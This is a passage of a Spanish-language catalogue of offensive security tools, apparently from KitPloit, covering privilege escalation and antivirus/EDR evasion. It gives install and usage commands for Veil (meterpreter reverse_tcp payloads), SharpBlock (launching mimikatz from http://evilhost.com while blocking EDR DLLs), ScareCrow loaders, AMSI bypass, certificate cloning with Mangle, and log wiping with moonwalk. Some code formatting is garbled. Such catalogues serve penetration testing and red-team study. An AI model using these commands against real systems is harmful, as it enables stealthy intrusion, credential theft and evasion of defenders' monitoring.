
# Run BeRoot with user password (If you know the password use it, you could get more results)
python beroot.py --password super_strong_password

Further information can be found here for:

  • Linux
  • Windows

image

Imagen usada de https://github.com/AlessandroZ/BeRoot

Evasión de Defensas

🔙Invoke-Obfuscation

Un ofuscador de comandos y scripts de PowerShell compatible con PowerShell v2.0+. Si un endpoint víctima puede ejecutar PowerShell, entonces esta herramienta es excelente para crear scripts muy ofuscados.

Instalación:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Uso:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil es una herramienta para generar payloads de metasploit que evitan soluciones antivirus comunes.

Se puede usar para generar shellcode ofuscado, consulte el blog oficial de Veil Framework para más información.

Instalación: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Instalar: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Uso:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Los creadores de Veil escribieron una [publicación en el blog](https://www.veil-framework.com/veil-command-line-usage/) que explica más sobre el uso de la línea de comandos de ordnance y evasion.

![image](https://assets.kitploit.com/production/public/readmes/147/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Un método para evadir las DLL de proyección activa de los EDR al evitar la ejecución del punto de entrada.

**Características:**

- Bloquea la ejecución del punto de entrada de las DLL de EDR, lo que impide que se coloquen ganchos de EDR.
- Omisión de AMSI sin parches que es indetectable para los escáneres que buscan parches de código de Amsi.dll en tiempo de ejecución.
- Proceso anfitrión que se reemplaza con un PE de implante que se puede cargar desde disco, HTTP o tubería con nombre (Cobalt Strike).
- El proceso implantado está oculto para ayudar a evadir los escáneres que buscan procesos huecos.
- Los argumentos de la línea de comandos se falsifican e implantan después de la creación del proceso mediante un método sigiloso de detección de EDR.
- Omisión de ETW sin parches.
- Bloquea la invocación de NtProtectVirtualMemory cuando el llamante está dentro del rango del espacio de direcciones de una DLL bloqueada.

**Instalación:**

Utilice [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) para compilar el binario de SharpBlock.

Abra el [proyecto .sln](https://github.com/CCob/SharpBlock) de SharpBlock, elija "Release" y compile.

**Uso:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Nice PenTestPartners blog post aquí.

image

Imagen tomada de https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz es un ofuscador de binarios x64 con GUI que puede ofuscar varios archivos PE diferentes, incluyendo:

  • .exe
  • .dll
  • .sys

Algunas características de ofuscación compatibles incluyen:

  • Ofuscación de movimientos inmediatos
  • Aplanamiento del flujo de control
  • Mutación ADD
  • Ofuscación del punto de entrada
  • Ofuscación Lea

Instalación: (Requisitos)

Instalar: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Uso:** 

Usando la GUI para ofuscar un binario:

1. Carga un binario haciendo clic en `file` en la esquina superior izquierda.
2. Añade funciones expandiendo el árbol `Functions`. (Puedes buscar poniendo el nombre en la barra de búsqueda en la parte superior)
3. Presiona `compile` (**Nota:** *Ofuscar muchas funciones puede tomar algunos segundos*)

![image](https://assets.kitploit.com/production/public/readmes/147/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

*Imagen usada de https://github.com/weak1337/Alcatraz*

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle es una herramienta que manipula aspectos de ejecutables compilados (.exe o DLL).

Mangle puede eliminar cadenas basadas en Indicadores de Compromiso (IoC) conocidos y reemplazarlas con caracteres aleatorios, cambiar el archivo inflando el tamaño para evitar EDRs, y puede clonar certificados de firma de código de archivos legítimos.

Al hacerlo, Mangle ayuda a los loaders a evadir escáneres en disco y en memoria.

**Instalación:** 

El primer paso, como siempre, es clonar el repositorio. Antes de compilar Mangle, necesitarás instalar las dependencias. Para instalarlas, ejecuta los siguientes comandos:```
go get github.com/Binject/debug/pe

Luego, constrúyelo``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Uso:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

La información completa de uso se puede encontrar aquí.

image

Imagen utilizada de https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail es un excelente sitio web que se puede usar para generar fragmentos de PowerShell ofuscados que rompen o deshabilitan AMSI para el proceso actual.

Los fragmentos se seleccionan aleatoriamente de un pequeño conjunto de técnicas/variaciones antes de ser ofuscados. Cada fragmento se ofusca en tiempo de ejecución/solicitud para que ninguna salida generada comparta las mismas firmas.

Excelente blog de f-secure explicando AMSI aquí.

image

Imagen utilizada de http://amsi.fail/

🔙ScareCrow

ScareCrow es un framework de creación de payloads para carga lateral (no inyección) en un proceso legítimo de Windows (evadiendo controles de listas blancas de aplicaciones).

Una vez que el cargador de DLL se carga en memoria, utiliza una técnica para eliminar el hook de un EDR de las DLL del sistema que se ejecutan en la memoria del proceso.

Cuando se ejecuta, ScareCrow copia los bytes de las DLL del sistema almacenadas en disco en C:\Windows\System32\. Estas DLL se almacenan en disco “limpias” de hooks de EDR porque son utilizadas por el sistema para cargar una copia sin alteraciones en un nuevo proceso cuando se genera. Dado que los EDR solo enganchan estos procesos en memoria, permanecen sin alteraciones.

Excelentes blogs para aprender sobre las técnicas utilizadas por ScareCrow:

  • Detección y Respuesta de Puntos Finales: Cómo los Hackers Han Evolucionado
  • EDR y Camuflaje: Cómo los Atacantes Evitan Ser Detectados

Instalación:

ScareCrow requiere golang 1.16.1 o posterior para compilar los loaders.```bash

Clone

git clone https://github.com/optiv/ScareCrow cd ScareCrow

Install dependencies

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo

Required

openssl osslsigncode mingw-w64

Build

go build ScareCrow.go

root@kitploit:~
**Uso:**```
Usage of ./ScareCrow:
  -I string
        Path to the raw 64-bit shellcode.
  -Loader string
        Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process using a JScript loader.
        [*] msiexec - Loads into MSIexec process using a JScript loader.
        [*] wscript - Loads into WScript process using a JScript loader. (default "binary")
  -O string
        Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
        The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
...

La información de uso completo se puede encontrar aquí.

image

Imagen tomada de https://github.com/optiv/ScareCrow

🔙moonwalk

moonwalk es un ejecutivo único de 400 KB que puede borrar tus rastros mientras realizas pruebas de penetración en una máquina Unix.

Guarda el estado de los registros del sistema antes de la explotación y revierte ese estado, incluyendo las marcas de tiempo del sistema de archivos después de la explotación, dejando cero rastros de un fantasma en el shell.

Instalación:```bash curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk

root@kitploit:~

Read more

Descargar herramienta
  • skanuvaty Escáner de DNS/red/puertos peligrosamente rápido
  • Metabigor Herramienta OSINT sin API
  • Gitrob Escáner de información sensible en GitHub
  • gowitness Utilidad de captura de pantalla web usando Chrome Headless